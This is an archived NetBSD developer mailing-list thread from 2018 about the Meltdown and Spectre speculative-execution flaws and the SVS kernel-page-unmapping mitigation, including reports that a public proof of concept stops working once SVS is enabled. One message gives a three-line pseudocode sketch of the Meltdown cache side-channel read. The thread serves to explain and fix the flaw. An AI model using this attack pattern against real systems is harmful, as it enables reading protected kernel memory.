Re: Current state of SVS and Meltdown

2018-01-30 Thread Mateusz Kocielski
On Sun, Jan 21, 2018 at 02:00:45PM +0100, Maxime Villard wrote:
> I committed this morning the last part needed to completely mitigate Meltdown
> on NetBSD-amd64. As I said in the commit message, we still need to change a
> few things for KASLR - there is some address leakage, we need to hide one
> instruction -, but otherwise the implementation should be perfectly 
> functional.
> 
> You can enable it by uncommenting
> 
>   #options SVS# Separate Virtual Space
> 
> and building a GENERIC or GENERIC_KASLR kernel. Currently there is no dynamic
> detection - that is to say, if you enable SVS, it remains enabled on AMD CPUs.
> As I said a few weeks ago I have a patch for that, but it's not in the tree
> yet.
> 
> My plan, once the dynamic detection is in, is to enable 'options SVS' by
> default. Then, when the kernel boots, if the CPU is not from Intel, SVS is
> disabled automatically (by either hotpatching or replacing the interrupt entry
> points). Once the system is up, the user will be able to disable SVS manually
> with a sysctl of the kind:
> 
>   # sysctl -w machdep.svs.enabled=0
> 
> This way if you have an Intel CPU, and you want good performances or don't
> care a lot about security, you will still be able to fall back to the default
> mode.
> 
> Unfortunately, the two Meltdown PoCs I tested on my i5 didn't work, and this,
> even with SVS disabled. Basically, I'm not able to make sure Meltdown is
> indeed mitigated entirely, but I'm able to make sure that userland runs with
> most of the kernel pages unmapped.
> 
> If someone with a functional PoC and vulnerable CPU could test SVS, that
> would be nice. For example the PoC Taylor sent on tech-kern a few days ago;
> it should be mitigated.
> 
> Also, it would be nice if someone familiar with x86 could proof-read the code
> I wrote, since it touches pretty critical places. Most of the code is at the
> end of [2], and the middle of [3] (SVS_* and TEXT_USER_*).

I've tested it using following PoC: https://github.com/logicaltrust/meltdown
on: cpu0: "Intel(R) Core(TM) i5-2500K CPU @ 3.30GHz" I can successfully
exploit this issue on an older kernel, but after applying your patches the bug
is gone (GENERIC with SVS enabled). Thanks for your work!

 Mateusz


Current state of SVS and Meltdown

2018-01-21 Thread Maxime Villard

I committed this morning the last part needed to completely mitigate Meltdown
on NetBSD-amd64. As I said in the commit message, we still need to change a
few things for KASLR - there is some address leakage, we need to hide one
instruction -, but otherwise the implementation should be perfectly functional.

You can enable it by uncommenting

#options SVS# Separate Virtual Space

and building a GENERIC or GENERIC_KASLR kernel. Currently there is no dynamic
detection - that is to say, if you enable SVS, it remains enabled on AMD CPUs.
As I said a few weeks ago I have a patch for that, but it's not in the tree
yet.

My plan, once the dynamic detection is in, is to enable 'options SVS' by
default. Then, when the kernel boots, if the CPU is not from Intel, SVS is
disabled automatically (by either hotpatching or replacing the interrupt entry
points). Once the system is up, the user will be able to disable SVS manually
with a sysctl of the kind:

# sysctl -w machdep.svs.enabled=0

This way if you have an Intel CPU, and you want good performances or don't
care a lot about security, you will still be able to fall back to the default
mode.

Unfortunately, the two Meltdown PoCs I tested on my i5 didn't work, and this,
even with SVS disabled. Basically, I'm not able to make sure Meltdown is
indeed mitigated entirely, but I'm able to make sure that userland runs with
most of the kernel pages unmapped.

If someone with a functional PoC and vulnerable CPU could test SVS, that
would be nice. For example the PoC Taylor sent on tech-kern a few days ago;
it should be mitigated.

Also, it would be nice if someone familiar with x86 could proof-read the code
I wrote, since it touches pretty critical places. Most of the code is at the
end of [2], and the middle of [3] (SVS_* and TEXT_USER_*).

Please test, thanks,
Maxime

[1] http://mail-index.netbsd.org/source-changes/2018/01/21/msg091335.html
[2] https://nxr.netbsd.org/xref/src/sys/arch/amd64/amd64/machdep.c
[3] https://nxr.netbsd.org/xref/src/sys/arch/amd64/include/frameasm.h


Re: meltdown

2018-01-06 Thread Michael
Hello,

On Sat, 6 Jan 2018 07:33:50 +
m...@netbsd.org wrote:

> Loongson-2 had an issue where from branch prediction it would prefetch
> instructions from the I/O area and deadlock.
> 
> This happened in normal usage so we build the kernel with a binutils
> flag to output different jumps and flush the BTB on kernel entry.*

I remember when we added support for those flags to our gcc & binutils.

> I wouldn't count on MIPS CPUs to hold under the same level of scrutiny
> as x86 CPUs, luckily they're pretty obscure (and most probably aren't
> speculative).

Yeah, I doubt there are a lot of IRIX servers left, and embedded MIPS
is probably safe ;)

have fun
Michael


Re: meltdown

2018-01-06 Thread Mouse
>> Though of course "fail early" is an obvious principle to security
>> types, given the cost of aborting work in progress I can easily see
>> the opposite being true for CPU designers (I'm not one, so I don't
>> really know).  Which idiom (check permissions, then speculate /
>> speculate, then check permissions) is more common?
> No idea, one would think that failing early in order to avoid
> unnecessary resource usage would be useful.

Perhaps, but _not_ failing is a win if it turns out the spec ex is
confirmed instead of annulled.  And if the silicon would be sitting
idle otherwise, the only resource used is power.  (And die area, but
that's used in a static sense, not a dynamic sense.)

> Then again, the problem seems to be that not everything from the
> speculative path gets canceled / annulled, not so much that the
> speculation took place.

I agree.  For cache issues...it might be useful to freeze spec ex on a
cache miss.  Go ahead and service the cache miss, but keep the result
in a separate cache line, not part of the normal cache.  On annullment,
just drop it; on confirmation, push it into the normal cache and
unfreeze.  If you want to get really fancy, have multiple speculative
cache lines, kind of a small cache in front of the regular cache purely
for speculative use, and don't freeze speculation unless it fills up.
Though the spectre (ha ha) of coherency then raises its ugly head.

Does anyone know how the typical time to service a cache miss compares
with the typical time to determine whether spec ex is annulled or
confirmed?  If the former is longer, or at least not much shorter, than
the latter, then this wouldn't even impair performance much in the miss
case.

Of course, this wouldn't do anything about covert channels other than
the cache.  But it'd stop anything using the cache for a covert channel
between spec ex and mainline code cold (meltdown and some variants of
spectre).  It's only a partial fix, but, for most purposes, that's
better than no fix.

Of course, some of the covert channels touched on in the spectre paper
are not fixable, such as power consumption and EMI generation;
fortunately, they are significantly harder to read from software.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTMLmo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread maya
On Sat, Jan 06, 2018 at 01:41:38AM -0500, Michael wrote:
> R10k had all sorts of weirdo speculative execution related problems
> ( see hardware workarounds in the O2 ), and I doubt it's the first to
> implement it.

Loongson-2 had an issue where from branch prediction it would prefetch
instructions from the I/O area and deadlock.

This happened in normal usage so we build the kernel with a binutils
flag to output different jumps and flush the BTB on kernel entry.*

I wouldn't count on MIPS CPUs to hold under the same level of scrutiny
as x86 CPUs, luckily they're pretty obscure (and most probably aren't
speculative).

* https://sourceware.org/ml/binutils/2009-11/msg00387.html


Re: meltdown

2018-01-05 Thread Mouse
>> "Possibly more"?  Anything that does speculative execution needs a
>> good hard look, and that's damn near everything these days.
> I wonder about just "these days".  The potential for this kind of
> problem goes all the way back to STRETCH or the 6600, doesn't it?

I don't know; I don't know enough about either.

> Though of course "fail early" is an obvious principle to security
> types, given the cost of aborting work in progress I can easily see
> the opposite being true for CPU designers

I think it's less the cost of aborting work in progress and more the
(performance) cost of not keeping silicon busy all the time.

> (I'm not one, so I don't really know).

Me neither.  But it seems passing obvious to me that these hardware
bugs were at least partially driven by customer demand for performance.
And, to be sure, there are workloads for which neither meltdown nor
spectre is a significant risk, even if the hardware is vulnerable.

> Which idiom (check permissions, then speculate / speculate, then
> check permissions) is more common?

I don't know.  But the problem is only partially when permissions get
checked.  Consider spectre used by sandboxed code to read outside the
sandbox within a single process; this is doing nothing that, from the
hardware point of view, would violate permissions.  I could easily see
a CPU designer saying "So what's the problem if the code can read that
memory?  It can read it anytime it wants with a simple load anyway.".
The problem is also failure to roll back _all_ side effects when
annulling speculative execution.  (To be sure, even if that were done
it wouldn't fix quite the whole problem; closing one side-channel
doesn't necessarily close other side-channels.  But it would help.)

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTMLmo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread Thor Lancelot Simon
On Thu, Jan 04, 2018 at 04:58:30PM -0500, Mouse wrote:
> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.

I wonder about just "these days".  The potential for this kind of problem
goes all the way back to STRETCH or the 6600, doesn't it?  If they had
memory permissions, which I frankly don't know.  And even in microprocessors
it's got to go back to... the end of the 1980s (R6000?) certainly the 1990s.

Though of course "fail early" is an obvious principle to security types,
given the cost of aborting work in progress I can easily see the
opposite being true for CPU designers (I'm not one, so I don't really
know).  Which idiom (check permissions, then speculate / speculate, then
check permissions) is more common?

Thor


RE: meltdown

2018-01-05 Thread Terry Moore
> I think you are confusing spectre and meltdown.

 

Yes, my apologies.

--Tery



Re: meltdown

2018-01-05 Thread Paul.Koning


> On Jan 4, 2018, at 6:01 PM, Warner Losh <i...@bsdimp.com> wrote:
> 
> 
> 
> On Thu, Jan 4, 2018 at 2:58 PM, Mouse <mo...@rodents-montreal.org> wrote:
> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
> 
> > Also, I understand that to exploit this, one has to attempt to access
> > kernel memory a lot, and SEGV at least once per bit.
> 
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
> 
> Nowhere in there is a SEGV generated.
> 
> That's the meltdown stuff.  Spectre targets other things (I've seen
> branch prediction mentioned) to leak information around protection
> barriers.
> 
> I think you are confusing spectre and meltdown.
> 
> meltdown requires a sequence like:
> 
> exception (*0 = 0 or a = 1 / 0);
> do speculative read
> 
> to force a trip into kernel land just before the speculative read so that 
> otherwise not readable stuff gets (or does not get) read into cache which can 
> then be probed for data.

No, that's not correct.  You were being mislead by the "Toy example".
The toy example demonstrates that speculative operation are done
after the point in the code that generates an exception, but it in
itself is NOT the exploit.

The exploit has the form:

x = read(secret_memory_location);
touch (cacheline[x]);
while (1) ;

The first line will SEGV, of course, but in the vulnerable CPUs
the speculative load is issued before that happens.  And also before
the SEGV happens, cacheline[x] is touched, making that line resident
in the cache.  This "transmits to the side channel".

Next, the SEGV happens.  The exploit catches that, and then it
does a timing test on references to cacheline[i] to see which i is
now resident.  That i is the value  of x.

As the paper points out, it would be possible in principle to prefix
the exploit with

if (false) // predict_true

so the illegal read is also speculative, and is voided (exception
and all) when the wrong branch prediction is sorted out. But it
looks like the paper is saying that refinement has not been
demonstrated, though such branch prediction hacks have been shown
in other exploits.  Still, if that can be done, a test for
"SEGV too often" is no help.

The Meltdown paper clearly says that the KAISER fix cures this
vulnerability.  And while it doesn't say so, it is also clear that
the problem does not exist on CPUs where speculative memory references
do page protection checks.

All the above applies to Meltdown.  Spectre is unrelated in its
core mechanism.  The fact that both eventually end up using side
channels and were published at the same time seems to have caused
some confusion between the two.  It is important to understand they
are independent, stem from different underlying problems, apply
to a different set of vulnerable chips, and have different cures.

paul



Re: meltdown

2018-01-05 Thread maya
If there's anything this issue showed is that we definitely need fewer
people independently considering the issue and openly discussing their
own (occasionally wrong) suggestions.

It was just a suggestion, I'm not a source of authority.


Re: meltdown

2018-01-05 Thread Dave Huang
On Jan 4, 2018, at 15:22, Phil Nelson  wrote:
> How about turning on the workaround for any process that ignores
> or catches SEGV.Any process that is terminated by a SEGV should
> be safe, shouldn't it?

Isn't there a suggested mitigation? Seems to me NetBSD should implement 
it as suggested, rather than coming up with its own special criteria 
for when to enable the workaround.
-- 
Name: Dave Huang |  Mammal, mammal / their names are called /
INet: k...@azeotrope.org |  they raise a paw / the bat, the cat /
Telegram: @DahanC|  dolphin and dog / koala bear and hog -- TMBG
Dahan: Hani G Y+C 42 Y++ L+++ W- C++ T++ A+ E+ S++ V++ F- Q+++ P+ B+ PA+ PL++



Re: meltdown

2018-01-05 Thread Phil Nelson
On Thursday 04 January 2018 12:49:22 m...@netbsd.org wrote:
> I wonder if we can count the number of SEGVs and if we get a few, turn
> on the workaround? 

How about turning on the workaround for any process that ignores
or catches SEGV.Any process that is terminated by a SEGV should
be safe, shouldn't it?

--Phil

-- 
Phil Nelson, http://pcnelson.net



Re: meltdown

2018-01-04 Thread Paul.Koning


> On Jan 4, 2018, at 4:58 PM, Mouse <mo...@rodents-montreal.org> wrote:
> 
>> As I understand it, on intel cpus and possibly more, we'll need to
>> unmap the kernel on userret, or else userland can read arbitrary
>> kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
> 
>> Also, I understand that to exploit this, one has to attempt to access
>> kernel memory a lot, and SEGV at least once per bit.
> 
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
> 
> Nowhere in there is a SEGV generated.

That depends.  The straightforward case of Meltdown starts with an
illegal load, which the CPU will execute anyway speculatively, resulting
in downstream code execution that can be used to change the cache state.
In that form, the load eventually aborts.

There's a discussion in the paper that the load could be preceded by
a branch not taken that's predicted taken.  If so, the SEGV would indeed
not happen, but it isn't clear how feasible this is.

In any case, the problem would not occur in any CPU that does protection
checks prior to issuing speculative memory references.  

paul



Re: meltdown

2018-01-04 Thread Mouse
> As I understand it, on intel cpus and possibly more, we'll need to
> unmap the kernel on userret, or else userland can read arbitrary
> kernel memory.

"Possibly more"?  Anything that does speculative execution needs a good
hard look, and that's damn near everything these days.

> Also, I understand that to exploit this, one has to attempt to access
> kernel memory a lot, and SEGV at least once per bit.

I don't think so.  Traps that would be taken during normal execution
are not taken during speculative execution.  The problem is, to quote
one writeup I found, "Intel CPUs are allowed to access kernel memory
when performing speculative execution, even when the application in
question is running in user memory space.  The CPU does check to see if
an invalid memory access occurs, but it performs the check after
speculative execution, not before.".  This means that things like cache
line loads can occur based on values the currently executing process
should not be able to access; timing access to data that cache-collides
with the cache lines of interest reveals the leaked bit(s).

Nowhere in there is a SEGV generated.

That's the meltdown stuff.  Spectre targets other things (I've seen
branch prediction mentioned) to leak information around protection
barriers.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTMLmo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-04 Thread maya
On Thu, Jan 04, 2018 at 10:01:34PM +0100, Kamil Rytarowski wrote:
> We have: PaX Segvguard. Can we mitigate it with this feature?
> 

that's what gave me the idea, but I think segvguard is per-binary, and I
could just make new binaries to keep on attacking the kernel.


Re: meltdown

2018-01-04 Thread Kamil Rytarowski
On 04.01.2018 21:49, m...@netbsd.org wrote:
> Also, I understand that to exploit this, one has to attempt to access
> kernel memory a lot, and SEGV at least once per bit.
> 
> I wonder if we can count the number of SEGVs and if we get a few, turn
> on the workaround? that would at least spare us the performance penalty
> for normal code.
> 

We have: PaX Segvguard. Can we mitigate it with this feature?



signature.asc
Description: OpenPGP digital signature


meltdown

2018-01-04 Thread maya
Yo.

As I understand it, on intel cpus and possibly more, we'll need to unmap
the kernel on userret, or else userland can read arbitrary kernel
memory.

People seem to be mentioning a 50% performance penalty and we might do
worse (we don't have vDSOs...)

Also, I understand that to exploit this, one has to attempt to access
kernel memory a lot, and SEGV at least once per bit.

I wonder if we can count the number of SEGVs and if we get a few, turn
on the workaround? that would at least spare us the performance penalty
for normal code.